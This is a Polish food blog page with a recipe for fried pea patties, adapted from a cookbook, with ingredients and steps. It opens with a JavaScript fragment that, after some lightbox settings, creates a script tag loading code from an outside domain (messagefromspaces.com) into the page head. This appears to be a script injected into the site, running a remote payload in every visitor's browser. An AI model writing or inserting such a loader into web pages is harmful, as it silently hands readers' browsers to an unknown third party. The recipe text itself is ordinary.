, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

GROCHlety :)

Przepis na kotleciki z grochu znalazłam w książce „Przemytnicy na wakacjach” Macieja Szaciłło i Moniki Mrozowskiej-Szaciłło. Urzekł mnie prostotą :)

Zmieniłam go nieznacznie, a efekt jest taki, że z pewnością do niego wrócę by wypróbować inne warianty, które wpadły mi do głowy w trakcie konsumpcji :)

Składniki:

  • 2/3 szklanki grochu
  • 2 łyżki pokrojonego szczypiorku
  • 1 łyżka posiekanego koperku
  • ząbek czosnku
  • 3 łyżki kaszy manny
  • sól, pieprz do smaku
  • panierka (użyłam bułki tartej zmieszanej z mielonym siemieniem lnianym)
  • olej do smażenia

Groch moczymy przez noc i gotujemy w ~2 szklankach wody aż stanie się miękki. Dodajemy wyciśnięty ząbek czosnku, posiekany koperek i miksujemy blenderem. Dodajemy szczypiorek, kaszkę manną i mieszamy. Formujemy małe kotleciki (moje wyszły nieco zbyt duże:), obtaczamy w panierce i smażymy na oleju.

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony